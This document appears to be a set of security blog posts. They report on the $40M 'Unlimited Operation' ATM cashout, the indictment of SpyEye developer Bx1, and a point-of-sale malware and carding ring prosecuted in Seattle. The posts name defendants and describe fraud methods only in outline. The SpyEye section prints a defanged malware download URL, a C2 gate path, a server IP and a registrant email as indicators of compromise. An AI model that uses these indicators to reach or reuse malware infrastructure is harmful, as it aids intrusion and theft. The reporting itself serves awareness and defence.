ATM Cashers in 26 Countries steal $40M

CBS News in New York has a video on their website this morning title Cyber-attacks behind possibly record-breaking bank heist. Former FBI Assistant Director John Miller shares the story and says "We've learned how they carried out this cyber-attack, and it's unlike anything ever seen before."

Except it isn't. In fact, on Tuesday morning this week I was sharing a presentation about financial cyber crimes with Iberia Bank in New Orleans, LA. I mentioned that one of the things that banks still need to be on the lookout for is true "intrusions" into their system. By planting malware on internal bank systems, criminals can gain deep penetrating access to the internal workings of the bank and take their time, recruiting specialists to help them learn the inner workings of the bank to coordinate very elaborate schemes.

The attack described by Miller involves a group who had partnered together around the world calling themselves the "Unlimited Operation". In the scheme he describes, hackers gain internal access to a bank, or in the most recent case "a Visa/MasterCard processing Center," and gain the ability to manipulate the withdrawal limit on certain ATM Debit cards. These card numbers are then distributed around the world to "Cashing Gangs" that make local copies of the ATM cards and build a network of cashers who "work the machines."

One of the most notorious hacking operations in U.S. History was "Solar Sunrise" - a deep penetration into the Pentagon's computer operations that served as a wake up call for the U.S. Government and lead to the production of a video (now available on YouTube) called

(YouTube video: Solar Sunrise: Dawn of a New Threat.

The hacker mastermind behind Solar Sunrise was an Israeli hacker, Ehud Tenenbaum, who called himself The Analyzer. In September of 2008 we wrote about him on this blog in the story Is The Analyzer Really Back? (The return of Ehud Tenenbaum) because Tenenbaum was the mastermind behind an attack against a Calgary-based financial services company. In that case, Tenenbaum penetrated the company's internal systems and gained the ability to alter or remove the ATM withdrawal limits. Then, teams of cashers, armed with counterfeit ATM cards bearing the magnetic stripe information corresponding to those accounts, hit the streets withdrawing $2 Million dollars in a blitz of ATM-withdrawals.

But that's not the only time it happened. This blog also ran the story in November 2009 called The $9 Million World-Wide Bank Robbery that shared the details of exactly the same type of raid being performed against RBS WorldPay, headquartered in Atlanta, Georgia. In that case, Estonian hackers penetrated the financial services company, that specializes in "Payroll Debit Cards". After doing so, they contracted with fellow-criminals in Russia, Yevgeny Anikin and Viktor Pleschcuk, who have both confessed their crimes, and received suspended sentences in the Russian bribery-based version of Justice. (See article: Hacker3 escapes jail time in RBS WorldPay ATM heist.) Anikin and Pleschuk worked with the famous Credit Card trading criminal BadB (Vladislav Horohorin) to build a network of cashers operating in 280 cities. Over the course of 12 hours, 2100 ATM machines in 280 cities allowed more than $9 Million in withdrawals from those 44 accounts.

That doesn't mean Cyber Criminals can't go to jail though! Vladislav Horohorin was arrested in Nice, France as he prepared to return to Moscow. (See the Daily Mail story, One of world's most wanted cyber criminals caught on French Riviera.) Horohorin, or "BadB" was the founder of Carder Planet, and was actually returned to the US, where he was tried and in April 2013 Sentenced to 88 Months in Prison.

For a look at one of the US-based casher rings in the RBS WorldPay case, we could also consider the case of Sonya Martin, a Nigerian woman, who ran the Chicago casher gang used in that case. Sonya's ring only withdrew $89,120 in Chicago, but she still got a 30 month sentence back in August 2012. See: Cell leader in RBS WorldPay fraud scheme sentenced.

One other case that used this methodology, and also had New York City ties, was the case that charged Ukrainians Yuriy Ryabinin and Ivan Biltse with performing $750,000 in ATM withdrawals. BankInfoSecurity.com reported the story in 2008, which documented that $5 million was withdrawn in more than 9,000 withdrawals "all around the world" on September 30th and October 1st of that year. According to an affidavit shared by Wired Magazine, this case was tied to a breach of a Citibank server that processed ATM withdrawals at 7-Eleven convenience stores.

In the current case described this morning by CBS, it was described that later today New York U.S. Attorney's office prosecutor Loretta Lynch would announce the arrest of seven members of a New York casher gang that hit ATM's up and down Broadway for almost $2 million during the most recent "Unlimited Operation" case. "Unlimited" was involved in a similar $5 Million raid against a financial institution in India. CBS shared a graphic of the location of ATM machines that were used in the arrests that will be announced later today.

In the New York case, the arrested cashers were:

• ALBERTO YUSI LAJUD-PEÑA, 23 (deceased)
• JAEL MEJIA COLLADO, 23
• JOAN LUIS MINIER LARA, 22
• EVAN JOSE PEÑA, 35
• JOSE FAMILIA REYES, 24
• ELVIS RAFAEL RODRIGUEZ, 24
• EMIR YASSER YEJE, 24
• CHUNG YU-HOLGUIN, 22

The Eastern District of New York's Press Release, Eight Members of New York Cell of Cybercrime Organization Indicted in $45 Million Cybercrime Campaign, released today, May 09, 2013, explains the details of how the cashers above, who withdrew $2.8 Million in New York, fit in to the larger "Unlimited Operations." In the first operation, the New York crew withdrew $400,000 from 140 ATMs in New York City in two hours and 25 minutes. In the second operation, February 19-20, 2013, the crew performed 3,000 ATM withdrawals, scoring $2.4 Million in cash between 3 PM on the 19th and 1:26 AM on the 20th, stealing about $240,000 per hour!

The worldwide take on the Feb 19-20 raid included 36,000 transactions and $40 million!

Alberto Yusi Lajud-Peña, the leader of the New York casher ring, laundered the cash, in one case depositing 7,491 $20 bills in a single transaction in Miami, Florida. The crew bought and sold "portable luxury goods" with the cash, including luxury watches and cars, including a Mercedes SUV and a Porsche Panamera valued at $250,000 between the two. Alberto, also known as "Prime" online, was murdered in the Dominican Republic sometime after these robberies occurred.

U.S. Attorney Lynch says that law enforcement authorities in Japan, Canada, Germany, and Romania made great contributions in the case, but that they also received cooperation from the authorities in the UAE, Dominican Republic, Mexico, Italy, Spain, Belgium, France, United Kingdom, Latvia, Estonia, Thailand, and Malaysia.

What these cases are intended to demonstrate is the importance of closely monitoring the internal corporate network for signs of a breach. In a presentation at ITWeb Security Summit this week, "Formulating an attack-focused security plan", Mandiant CSO Richard Bejtlich shares that 75% of break-ins happen through someone clicking on or responding to a malicious email, and that in 2/3rds of incidents, the breach isn't discovered by the company but is reported by a third party organization. Bejlitch says that by the time the attacker is discovered "they will have been inside your company for around eight months."

That's what Malcovery's Today's Top Threats report is intended to address. What is that Top Threat email that is going to lead to criminals having control of one or more of your internal employees? It takes time for the criminal to learn enough about your organization's internal workings to be able to take over and reset ATM balances. Quick detection of the breach is key to preventing problems like those described above.

SpyEye Botherder BX1 - welcome to Georgia!

Timeline:

• December 20, 2011 - Federal Indictment was filed in chambers
• December 21, 2011 - Arrest warrant issued to US Marshalls
• March 2012 - MicrosoftDCU, FS-ISAC, and NACHA vs. Zeus - the Microsoft digital crimes unit files civil actions against John Does 1-39, which included Bx1.
• Jan 10, 2013 - Krebs: Police Arrest Alleged ZeuS Botmaster “bx1”
• April 29, 2013 - Redacted indictment unsealed
• May 3, 2013 - Three-Year Hunt Nabs Hacker Who Popularized Cybercrime

The BX1 Indictment

(Click to download the Bx1 Indictment) North District of Georgia (Atlanta)

Criminal Docket for Case#: 1:11-cr-00557-UNA-1 (filed 12/20/2011)

Counts:

(1) 18:1349 Attempt and Conspiracy to Commit Mail Fraud
(2-11) 18:1343 & 2 – Fraud by Wire, Radio, or Television
(13) 18:1030(a)(5)(A), 1030(c)(4)(B) – Fraud Activity Connected with Computers
(14-23) 18:1030(a)(2)(C), 1030(c)(2)(B)(i) – Fraud Activity Connected with Computers

From December 2009 to September 2011 [Redacted] and Hamza Bendelladj, AKA Bx1 conspired to … defraud financial institutions and individuals and obtain money and property from them by means of materially false and fraudulent pretenses, representations and promises, as well as omission of material facts, including moneys, funds, credits, assets, and other properties.

Botnets were defined and described, and SpyEye was described as having the capabilities to “facilitate the theft of confidential personal and financial information by numerous examples including a data grabber or keystroke logger, and at times by presenting a fake bank web page or portions of a bank web page to trick a user into entering personal information.

(The principal author of SpyEye is redacted in the published Indictment). Bx1 is listed as a co-conspirator who helped develop SpyEye components. The behavior of SpyEye is described in great detail, including the creation and deployment of particular Web Injects and how they behave.

Bx1 communicated through email, instant messaging programs, and web forums to discuss purchasing, updating, customizing, developing components for, and pricing SpyEye, as well as aspects of operating SpyEye components.

From at least February 21, 2011 through February 24, 2011 at least one of Bx1’s C&C servers were located in Atlanta, Georgia, distributing configs that targeted 253 unique financial institutions.

Counts 2 through 11 of the indictment trace particular infections that could be documented through the logs of the Atlanta-based server and which lead to confirmed financial losses of particular victims in California, North Carolina, New York, and Virginia.

Count 12 names particular websites used by Bx1 for his advertising, including the website www.darkode.com where particular messages in January, June, July, and September 2010 are cited. The June issue discussed “Form Grabbing” while an update in September introduced the ability to scan all controlled bots for Credit Card credentials. In April 2011, the YouTube user “danielhb1988” called himself Bx1 and claimed to be selling SpyEye in a video advertised on that site. In July 2011, an undercover law enforcement officer purchased SpyEye from Bx1 for $8,500, receiving his purchased code from www.sendspace.com.

Counts 14 through 23 document particular examples of the SpyEye server at 75.127.109.16, communicating with protected computers

The Atlanta Server

During the time period stated in the indictment, the IP address indicated was known to be distributing malware from the hostile URL (spaces added for safety):

www . 100myr . com / cp / bin / exe . exe

www . 100myr . com / cp / gate . php ? guid = (infected machine configuration report stuff here)

That server was hosted at Global Network Access (gnax.net) in Atlanta.

The domain was registered January 20, 2011 on Joker.com by random68@live.com

That same email address was used to register the domain "bx1.biz"

Carder Christopher Schroebel gets Seven Years

21 years old and thinking about Cybercrime as a career choice?  Think again.  Seattle-based U.S. Attorney Jenny Durkan told a press conference back on June 11, 2012 "People think that cybercriminals cannot be found or apprehended.  Today we know that's not true.  You cannot hide in cyberspace.  We will find you.  We will charge you.  We will extradite you and we will prosecute you." (see: MSNBC: Feds Arrest Alleged Credit Card Fraud Kingpin.) 

Christopher A. Schroebel

Durkan seems to be standing true to her word.  Friday her office successfully sentenced Christopher A. Schroebel, a 21 year old man from Maryland, to seven years in prison. 

The "Official" complaint against Schroebel says that on a date before July 20, 2011 and continuing until August 3, 2011 Schroebel was stealing information from Mondello's Italian Restaurant,  specifically the data from credit cards belonging to K.H., K.W., J.H., V.D., S.J., and M.H..  That gives us the first charge - Obtaining Information From a Protected Computer.

An interview in the Seattle Times explains what Schroebel did, from the perspective of Corino Bonjrada, the owner of Modello Risorante Italiano.  Schroebel had planted spyware in the Point of Sale terminals of dozens of businesses.  Bonjrada told the Times "Some of my customers were saying they didn't know if they wanted to come back.  They were afraid."  Some of the customers were hit with fraudulent charges "within 10 minutes"of swiping out at his restaurant.  (See: Dutch man charged with stealing Washington credit cards.)
  
Schroebel was arrested last November possessing over 84,000 stolen or purchased credit card data stripes and made his first court appearance November 21, 2011.  At that time, he was sentenced to an inpatient substance abuse program, and was released from that program on December 26, 2011.   He was picked up and arrested again on a local warrant, and ordered detained as a flight risk January 24, 2012.  So, he has already been in prison nearly more than eight months at this point.  (Detention order is available at archive.org.

Schroebel entered a plea agreement on May 15, 2012,  and was held pending his August 10, 2012 sentencing.  (See: PACER case number; 180519, Docket 2:2011-cr-00391-RSM.)


The Seattle Police Department describes it a bit better:

The SPD has been actively investigating unauthorized computer intrusions ("hacks") into the computer systems of small businesses located in the Western District of Washington (including Mondello's Italian Restaurant in Magnolia and Seattle Restaurant Store in Shoreline).

The person/s responsible for the hacks installed malicious software ("malware") on the computer systems of the victim businesses.  The malware was designed to, and has collected credit card account numbers belonging to customers/clients of the victim businesses.  The stolen credit card account numbers were then transmitted over the Internet to a computer server under the control of the hacker/s and/or their associations.

USSS ECTF/NCFI Success Story

That's from the affidavit of a SPD Computer Forensics Detective, David Dunn.  He is a member of the USSS Electronic Crimes Task Force, Seattle Field Office.  The Secret Service partners with local police departments all across the country to share their Computer Forensics capability in the form of free training and expertise to help work these cases.  Part of that training is right here in Hoover, Alabama at the National Computer Forensics Institute.  (David actually responded to this post, giving permission to share his name, and confirming that he took AFT (Advanced Forensics Training) and NITRO (Network Intrusion Response) courses at the National Computer Forensics Institute in Hoover.)

Listen to the training and experience this guy got by being a local law enforcement part of the USSS Electronic Crimes Task Force.

In April of 2005, I was transferred to the Seattle Police Department Fraud unit as a Computer Forensic Detective.  I am currently, and since October of 2006 have been assigned as a full time member of the USSS Electronic Crimes Task Force, Seattle Field Office.  I hold a Special Deputation appointment through the United States Marshals Service that permits me to seek and execute arrest and search warrants supporting a federal task force.  As a member of the Seattle USSS E-Crimes Task Force, I investigate violations of federal law in the state of Washington that fall under the responsibility of the USSS, with an emphasis on crimes involving computers, the Internet, and electronic communications.

(...Many local training courses listed, and then... )
My training and experience also specifically includes training and experience regarding computer and network intrusions, commonly known as "hacking."  This includes completion of the 40 hour "Incident Handling and Response" course on network intrusions and incident response through the Department of Homeland Security.  I have experience with packet analysis, malware, and viruses.  I am a Certified Ethical Hacker.  I have attended 104 hours of training in Network Intrusion Response at the National Computer Forensic Institute.  I hold the following certifications: EnCase Certified Examiner, Access Data Certified Examiner, IACIS Computer Forensic Certified Examiner.  I have received advanced training in both network intrusion forensics as well as Point of Sale forensic investigations.

As a member of the USSS ECrimes Task Force, I have worked on numerous computer and network intrusion cases.  These cases have involved a range of hacker techniques and modus operandi, including social engineering, SQL injection attacks, botnet attacks, malware infections and various other menas of computer infection and attack.  I have examined myriad server logs and volumes of  IP address information as part of my investigation of various hacking cases.  I have also created and examined forensic images of dozens of infected and hacked computers and servers.  I have investigated cyber cases involving both national and international victims and suspects.  As a result, I am familiar with schemes involving large scale Internet crimes and network atacks.

(Here's a picture with my summer students from the National Science Foundation Research Experience for Undergraduates at the NCFI - sorry - shameless plug - I think this place is great!)

Back to the Hacking Charges

The Complaint then says that "knowingly and with the intent to defraud, trafficked in and used credit card track data from credit card accounts belonging to (the above) without their knowledge or consent, and by such conduct obtained profits aggregating $1,000 or more, said trafficking affecting interstate and foreign commerce, in that the credit card account numbers that were so trafficked and used by Schroebel and others to make fraudulent purchases in states outside the State of Washington."  That's the second charge - Access Device Fraud.

When Schroebel was arrested, he was in possession of 84,000 credit card numbers that he had stolen or bought from other hackers.

When the SPD investigated the charges made on the cards used by the customers at Mondello's they led them to California. One of the cards, belonging to K.H. was used at Home Depot, Wal-Mart, Jack-n-the-Box, and several other locations.  V.D. and S.J. dined together at Mondello's on July 30, 2011, and BOTH had their cards being used for fraudulent purchases in Southern California on July 31, 2011.

That's where we get to the next interesting member of our trio, GUERILLA BLACK.

GUERILLA BLACK, MRBUSINESSMAN62, BLACKDOLLA, Charles Tony Williamson

(click for press release)

The Indictment of Guerilla Black fills in the California end of the story.



Guerilla Black is described as a "B.I.G. look-alike" (or some would say imitator).  Apparently the record sales needed a bit of supplement to help him live the private jets and limos image he attempted to maintain in his youTube videos.  (Shown above is the track "Compton".)

From at least January 2011 credit cards stolen by Schroebel were showing up in California, being used by Guerilla Black and his crew.  Black's indictment shows many entries such as:

19. On or about February 9, 2011, the coconspirator who hacked the point of sale computer system at the Shoreline, WA business sent an e-mail to CHARLES TONY WILLIAMSON, that contained multiple customer credit card numbers that were stolen through the hack of that business, including at least one credit card number that had been issued by Boeing Employees' Credit Union.

or

32. On or about July 31, 2011, the coconspirator who hacked the point of sale computer system at the Seattle, WA restaurant sent an e-mail to CHARLES TONY WILLIAMSON, that contained multiple customer credit card numbers that were stolen through the hack of that business, including at least two credit card numbers that had been issued by Boeing Employees' Credit Union.


 (Gee, which two would those be?)

The indictment lays out that Williamson "expressed his preference and desire to coconspirators to buy 'dumps' of stolen credit card numbers 'in bulk,' that is, in lots of at least 100, or 500, or more."  and that he "expressed his preference and desire...to obtain credit card numbers that were 'freshly' stolen through 'point of sale system' computer network intrusions rather than card numbers that were skimmed or stolen from credit card databases compiled by others, because the 'fresh' card numbers stolen from point of sale system hacks could be used more successfully for fraudulent transactions."

Williamson "redistributed the stolen card numbers to a network of criminal associates, with the intente and the expectation that these associates would then use the stolen credit card numbers for fraudulent transactions."

But Williamson wasn't the only one Schroebel was selling to . . .

Schrooten / Fortezza

As it turns out, Schroebel would sell the cards he acquired from these POS terminals to another 21 year old, Dutch national David Benjamin Schrooten, who ran a website that sold credit cards to others for their use.

Schrooten will be well-known under his hacker name "Fortezza" to anyone who follows the excellent blog KrebsOnSecurity.com.  Krebs story Feds Arrest Kurupt Carding Kingpin tells us more about the English language carding site run by Fortezza called Kurupt.su.  According to Krebs, Fortezza gained many of his cards by breaking in to a competing carding site.  In retaliation, THOSE carders posted a message announcing that Fortezza "needs to learn not to fuck with Russians !!!" and providing his information, including real name, city, home address, shipping address, telephone number, and fax number.

Krebs has a screen shot of the post on his blog:



Schrooten was arrested as he got off a plane in Romania, and later extradicted to the United States.  He will be tried in September in Seattle.


(click for press release)


According to the Schrooten indictment (also from KrebsOnSecurity) Schrooten is charged with Conspiracy to Commit Access Device Fraud and Bank Fraud, 2 counts of Access Device Fraud, 5 counts of Bank Fraud, 1 count of Intentional Damage to a Protected Computer, and 5 counts of Aggravated Identity Theft.

As we've discussed before, one of the ways our judicial system is not geared up for handling international cybercrime is that wherever these cases are tried, they address only the charges LOCAL TO THAT JURISDICTION.  So, in this case, the trial is in Seattle, which means the only victims who can be named are those with a connection to the Western District of Washington.  Particularly this trio of cases focuses on the charge that the Boeing Employees' Credit Union, and members of the credit union who reside in the Western District of Washington, had money stolen by these criminals.  So, the counts of Bank Fraud against Schrooten specifically refer to transactions on April 25, 2011, August 20, 2011, December 21, 2011, and two on February 1, 2012, where the account holder was a BECU customer who lived within the jurisdiction of this court.



There will likely be more arrests, and more sentences, in this case in the near future.  I wanted to share it now though because it is a great example of what happens when a smart local detective partners with the USSS Electronic Crimes Task Force, and runs down a local crime, along with its international implications.